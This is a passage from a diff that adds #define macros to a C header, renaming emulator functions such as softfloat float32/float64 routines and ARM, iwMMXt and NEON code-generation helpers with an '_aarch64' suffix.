+#define float16_is_signaling_nan float16_is_signaling_nan_aarch64 +#define float16_maybe_silence_nan float16_maybe_silence_nan_aarch64 +#define float16ToCommonNaN float16ToCommonNaN_aarch64 +#define float16_to_float32 float16_to_float32_aarch64 +#define float16_to_float64 float16_to_float64_aarch64 +#define float32_abs float32_abs_aarch64 +#define float32_add float32_add_aarch64 +#define float32_chs float32_chs_aarch64 +#define float32_compare float32_compare_aarch64 +#define float32_compare_internal float32_compare_internal_aarch64 +#define float32_compare_quiet float32_compare_quiet_aarch64 +#define float32_default_nan float32_default_nan_aarch64 +#define float32_div float32_div_aarch64 +#define float32_eq float32_eq_aarch64 +#define float32_eq_quiet float32_eq_quiet_aarch64 +#define float32_exp2 float32_exp2_aarch64 +#define float32_exp2_coefficients float32_exp2_coefficients_aarch64 +#define float32_is_any_nan float32_is_any_nan_aarch64 +#define float32_is_infinity float32_is_infinity_aarch64 +#define float32_is_neg float32_is_neg_aarch64 +#define float32_is_quiet_nan float32_is_quiet_nan_aarch64 +#define float32_is_signaling_nan float32_is_signaling_nan_aarch64 +#define float32_is_zero float32_is_zero_aarch64 +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_aarch64 +#define float32_le float32_le_aarch64 +#define float32_le_quiet float32_le_quiet_aarch64 +#define float32_log2 float32_log2_aarch64 +#define float32_lt float32_lt_aarch64 +#define float32_lt_quiet float32_lt_quiet_aarch64 +#define float32_max float32_max_aarch64 +#define float32_maxnum float32_maxnum_aarch64 +#define float32_maxnummag float32_maxnummag_aarch64 +#define float32_maybe_silence_nan float32_maybe_silence_nan_aarch64 +#define float32_min float32_min_aarch64 +#define float32_minmax float32_minmax_aarch64 +#define float32_minnum float32_minnum_aarch64 +#define float32_minnummag float32_minnummag_aarch64 +#define float32_mul float32_mul_aarch64 +#define float32_muladd 
float32_muladd_aarch64 +#define float32_rem float32_rem_aarch64 +#define float32_round_to_int float32_round_to_int_aarch64 +#define float32_scalbn float32_scalbn_aarch64 +#define float32_set_sign float32_set_sign_aarch64 +#define float32_sqrt float32_sqrt_aarch64 +#define float32_squash_input_denormal float32_squash_input_denormal_aarch64 +#define float32_sub float32_sub_aarch64 +#define float32ToCommonNaN float32ToCommonNaN_aarch64 +#define float32_to_float128 float32_to_float128_aarch64 +#define float32_to_float16 float32_to_float16_aarch64 +#define float32_to_float64 float32_to_float64_aarch64 +#define float32_to_floatx80 float32_to_floatx80_aarch64 +#define float32_to_int16 float32_to_int16_aarch64 +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_aarch64 +#define float32_to_int32 float32_to_int32_aarch64 +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_aarch64 +#define float32_to_int64 float32_to_int64_aarch64 +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_aarch64 +#define float32_to_uint16 float32_to_uint16_aarch64 +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_aarch64 +#define float32_to_uint32 float32_to_uint32_aarch64 +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_aarch64 +#define float32_to_uint64 float32_to_uint64_aarch64 +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_aarch64 +#define float32_unordered float32_unordered_aarch64 +#define float32_unordered_quiet float32_unordered_quiet_aarch64 +#define float64_abs float64_abs_aarch64 +#define float64_add float64_add_aarch64 +#define float64_chs float64_chs_aarch64 +#define float64_compare float64_compare_aarch64 +#define float64_compare_internal float64_compare_internal_aarch64 +#define float64_compare_quiet float64_compare_quiet_aarch64 +#define float64_default_nan float64_default_nan_aarch64 +#define float64_div float64_div_aarch64 +#define float64_eq 
float64_eq_aarch64 +#define float64_eq_quiet float64_eq_quiet_aarch64 +#define float64_is_any_nan float64_is_any_nan_aarch64 +#define float64_is_infinity float64_is_infinity_aarch64 +#define float64_is_neg float64_is_neg_aarch64 +#define float64_is_quiet_nan float64_is_quiet_nan_aarch64 +#define float64_is_signaling_nan float64_is_signaling_nan_aarch64 +#define float64_is_zero float64_is_zero_aarch64 +#define float64_le float64_le_aarch64 +#define float64_le_quiet float64_le_quiet_aarch64 +#define float64_log2 float64_log2_aarch64 +#define float64_lt float64_lt_aarch64 +#define float64_lt_quiet float64_lt_quiet_aarch64 +#define float64_max float64_max_aarch64 +#define float64_maxnum float64_maxnum_aarch64 +#define float64_maxnummag float64_maxnummag_aarch64 +#define float64_maybe_silence_nan float64_maybe_silence_nan_aarch64 +#define float64_min float64_min_aarch64 +#define float64_minmax float64_minmax_aarch64 +#define float64_minnum float64_minnum_aarch64 +#define float64_minnummag float64_minnummag_aarch64 +#define float64_mul float64_mul_aarch64 +#define float64_muladd float64_muladd_aarch64 +#define float64_rem float64_rem_aarch64 +#define float64_round_to_int float64_round_to_int_aarch64 +#define float64_scalbn float64_scalbn_aarch64 +#define float64_set_sign float64_set_sign_aarch64 +#define float64_sqrt float64_sqrt_aarch64 +#define float64_squash_input_denormal float64_squash_input_denormal_aarch64 +#define float64_sub float64_sub_aarch64 +#define float64ToCommonNaN float64ToCommonNaN_aarch64 +#define float64_to_float128 float64_to_float128_aarch64 +#define float64_to_float16 float64_to_float16_aarch64 +#define float64_to_float32 float64_to_float32_aarch64 +#define float64_to_floatx80 float64_to_floatx80_aarch64 +#define float64_to_int16 float64_to_int16_aarch64 +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_aarch64 +#define float64_to_int32 float64_to_int32_aarch64 +#define float64_to_int32_round_to_zero 
float64_to_int32_round_to_zero_aarch64 +#define float64_to_int64 float64_to_int64_aarch64 +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_aarch64 +#define float64_to_uint16 float64_to_uint16_aarch64 +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_aarch64 +#define float64_to_uint32 float64_to_uint32_aarch64 +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_aarch64 +#define float64_to_uint64 float64_to_uint64_aarch64 +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_aarch64 +#define float64_trunc_to_int float64_trunc_to_int_aarch64 +#define float64_unordered float64_unordered_aarch64 +#define float64_unordered_quiet float64_unordered_quiet_aarch64 +#define float_raise float_raise_aarch64 +#define floatx80_add floatx80_add_aarch64 +#define floatx80_compare floatx80_compare_aarch64 +#define floatx80_compare_internal floatx80_compare_internal_aarch64 +#define floatx80_compare_quiet floatx80_compare_quiet_aarch64 +#define floatx80_default_nan floatx80_default_nan_aarch64 +#define floatx80_div floatx80_div_aarch64 +#define floatx80_eq floatx80_eq_aarch64 +#define floatx80_eq_quiet floatx80_eq_quiet_aarch64 +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_aarch64 +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_aarch64 +#define floatx80_le floatx80_le_aarch64 +#define floatx80_le_quiet floatx80_le_quiet_aarch64 +#define floatx80_lt floatx80_lt_aarch64 +#define floatx80_lt_quiet floatx80_lt_quiet_aarch64 +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_aarch64 +#define floatx80_mul floatx80_mul_aarch64 +#define floatx80_rem floatx80_rem_aarch64 +#define floatx80_round_to_int floatx80_round_to_int_aarch64 +#define floatx80_scalbn floatx80_scalbn_aarch64 +#define floatx80_sqrt floatx80_sqrt_aarch64 +#define floatx80_sub floatx80_sub_aarch64 +#define floatx80ToCommonNaN floatx80ToCommonNaN_aarch64 +#define floatx80_to_float128 floatx80_to_float128_aarch64 
+#define floatx80_to_float32 floatx80_to_float32_aarch64 +#define floatx80_to_float64 floatx80_to_float64_aarch64 +#define floatx80_to_int32 floatx80_to_int32_aarch64 +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_aarch64 +#define floatx80_to_int64 floatx80_to_int64_aarch64 +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_aarch64 +#define floatx80_unordered floatx80_unordered_aarch64 +#define floatx80_unordered_quiet floatx80_unordered_quiet_aarch64 +#define flush_icache_range flush_icache_range_aarch64 +#define format_string format_string_aarch64 +#define fp_decode_rm fp_decode_rm_aarch64 +#define frame_dummy frame_dummy_aarch64 +#define free_range free_range_aarch64 +#define fstat64 fstat64_aarch64 +#define futex_wait futex_wait_aarch64 +#define futex_wake futex_wake_aarch64 +#define gen_aa32_ld16s gen_aa32_ld16s_aarch64 +#define gen_aa32_ld16u gen_aa32_ld16u_aarch64 +#define gen_aa32_ld32u gen_aa32_ld32u_aarch64 +#define gen_aa32_ld64 gen_aa32_ld64_aarch64 +#define gen_aa32_ld8s gen_aa32_ld8s_aarch64 +#define gen_aa32_ld8u gen_aa32_ld8u_aarch64 +#define gen_aa32_st16 gen_aa32_st16_aarch64 +#define gen_aa32_st32 gen_aa32_st32_aarch64 +#define gen_aa32_st64 gen_aa32_st64_aarch64 +#define gen_aa32_st8 gen_aa32_st8_aarch64 +#define gen_adc gen_adc_aarch64 +#define gen_adc_CC gen_adc_CC_aarch64 +#define gen_add16 gen_add16_aarch64 +#define gen_add_carry gen_add_carry_aarch64 +#define gen_add_CC gen_add_CC_aarch64 +#define gen_add_datah_offset gen_add_datah_offset_aarch64 +#define gen_add_data_offset gen_add_data_offset_aarch64 +#define gen_addq gen_addq_aarch64 +#define gen_addq_lo gen_addq_lo_aarch64 +#define gen_addq_msw gen_addq_msw_aarch64 +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_aarch64 +#define gen_arm_shift_im gen_arm_shift_im_aarch64 +#define gen_arm_shift_reg gen_arm_shift_reg_aarch64 +#define gen_bx gen_bx_aarch64 +#define gen_bx_im gen_bx_im_aarch64 +#define gen_clrex gen_clrex_aarch64 
+#define generate_memory_topology generate_memory_topology_aarch64 +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_aarch64 +#define gen_exception gen_exception_aarch64 +#define gen_exception_insn gen_exception_insn_aarch64 +#define gen_exception_internal gen_exception_internal_aarch64 +#define gen_exception_internal_insn gen_exception_internal_insn_aarch64 +#define gen_exception_return gen_exception_return_aarch64 +#define gen_goto_tb gen_goto_tb_aarch64 +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_aarch64 +#define gen_helper_add_saturate gen_helper_add_saturate_aarch64 +#define gen_helper_add_setq gen_helper_add_setq_aarch64 +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_aarch64 +#define gen_helper_clz32 gen_helper_clz32_aarch64 +#define gen_helper_clz64 gen_helper_clz64_aarch64 +#define gen_helper_clz_arm gen_helper_clz_arm_aarch64 +#define gen_helper_cpsr_read gen_helper_cpsr_read_aarch64 +#define gen_helper_cpsr_write gen_helper_cpsr_write_aarch64 +#define gen_helper_crc32_arm gen_helper_crc32_arm_aarch64 +#define gen_helper_crc32c gen_helper_crc32c_aarch64 +#define gen_helper_crypto_aese gen_helper_crypto_aese_aarch64 +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_aarch64 +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_aarch64 +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_aarch64 +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_aarch64 +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_aarch64 +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_aarch64 +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_aarch64 +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_aarch64 +#define gen_helper_double_saturate gen_helper_double_saturate_aarch64 +#define gen_helper_exception_internal gen_helper_exception_internal_aarch64 +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_aarch64 +#define 
gen_helper_get_cp_reg gen_helper_get_cp_reg_aarch64 +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_aarch64 +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_aarch64 +#define gen_helper_get_user_reg gen_helper_get_user_reg_aarch64 +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_aarch64 +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_aarch64 +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_aarch64 +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_aarch64 +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_aarch64 +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_aarch64 +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_aarch64 +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_aarch64 +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_aarch64 +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_aarch64 +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_aarch64 +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_aarch64 +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_aarch64 +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_aarch64 +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_aarch64 +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_aarch64 +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_aarch64 +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_aarch64 +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_aarch64 +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_aarch64 +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_aarch64 +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_aarch64 +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_aarch64 +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_aarch64 +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_aarch64 +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_aarch64 +#define gen_helper_iwmmxt_cmpgtub 
gen_helper_iwmmxt_cmpgtub_aarch64 +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_aarch64 +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_aarch64 +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_aarch64 +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_aarch64 +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_aarch64 +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_aarch64 +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_aarch64 +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_aarch64 +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_aarch64 +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_aarch64 +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_aarch64 +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_aarch64 +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_aarch64 +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_aarch64 +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_aarch64 +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_aarch64 +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_aarch64 +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_aarch64 +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_aarch64 +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_aarch64 +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_aarch64 +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_aarch64 +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_aarch64 +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_aarch64 +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_aarch64 +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_aarch64 +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_aarch64 +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_aarch64 +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_aarch64 +#define gen_helper_iwmmxt_packsl 
gen_helper_iwmmxt_packsl_aarch64 +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_aarch64 +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_aarch64 +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_aarch64 +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_aarch64 +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_aarch64 +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_aarch64 +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_aarch64 +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_aarch64 +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_aarch64 +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_aarch64 +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_aarch64 +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_aarch64 +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_aarch64 +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_aarch64 +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_aarch64 +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_aarch64 +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_aarch64 +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_aarch64 +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_aarch64 +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_aarch64 +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_aarch64 +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_aarch64 +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_aarch64 +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_aarch64 +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_aarch64 +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_aarch64 +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_aarch64 +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_aarch64 +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_aarch64 +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_aarch64 +#define 
gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_aarch64 +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_aarch64 +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_aarch64 +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_aarch64 +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_aarch64 +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_aarch64 +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_aarch64 +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_aarch64 +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_aarch64 +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_aarch64 +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_aarch64 +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_aarch64 +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_aarch64 +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_aarch64 +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_aarch64 +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_aarch64 +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_aarch64 +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_aarch64 +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_aarch64 +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_aarch64 +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_aarch64 +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_aarch64 +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_aarch64 +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_aarch64 +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_aarch64 +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_aarch64 +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_aarch64 +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_aarch64 +#define gen_helper_neon_abd_u16 
gen_helper_neon_abd_u16_aarch64 +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_aarch64 +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_aarch64 +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_aarch64 +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_aarch64 +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_aarch64 +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_aarch64 +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_aarch64 +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_aarch64 +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_aarch64 +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_aarch64 +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_aarch64 +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_aarch64 +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_aarch64 +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_aarch64 +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_aarch64 +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_aarch64 +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_aarch64 +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_aarch64 +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_aarch64 +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_aarch64 +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_aarch64 +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_aarch64 +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_aarch64 +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_aarch64 +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_aarch64 +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_aarch64 +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_aarch64 +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_aarch64 +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_aarch64 +#define gen_helper_neon_cgt_u8 
gen_helper_neon_cgt_u8_aarch64 +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_aarch64 +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_aarch64 +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_aarch64 +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_aarch64 +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_aarch64 +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_aarch64 +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_aarch64 +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_aarch64 +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_aarch64 +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_aarch64 +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_aarch64 +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_aarch64 +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_aarch64 +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_aarch64 +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_aarch64 +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_aarch64 +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_aarch64 +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_aarch64 +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_aarch64 +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_aarch64 +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_aarch64 +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_aarch64 +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_aarch64 +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_aarch64 +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_aarch64 +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_aarch64 +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_aarch64 +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_aarch64 +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_aarch64 +#define gen_helper_neon_min_u16 
gen_helper_neon_min_u16_aarch64 +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_aarch64 +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_aarch64 +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_aarch64 +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_aarch64 +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_aarch64 +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_aarch64 +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_aarch64 +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_aarch64 +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_aarch64 +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_aarch64 +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_aarch64 +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_aarch64 +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_aarch64 +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_aarch64 +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_aarch64 +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_aarch64 +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_aarch64 +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_aarch64 +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_aarch64 +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_aarch64 +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_aarch64 +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_aarch64 +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_aarch64 +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_aarch64 +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_aarch64 +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_aarch64 +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_aarch64 +#define 
gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_aarch64 +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_aarch64 +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_aarch64 +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_aarch64 +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_aarch64 +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_aarch64 +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_aarch64 +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_aarch64 +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_aarch64 +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_aarch64 +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_aarch64 +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_aarch64 +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_aarch64 +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_aarch64 +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_aarch64 +#define 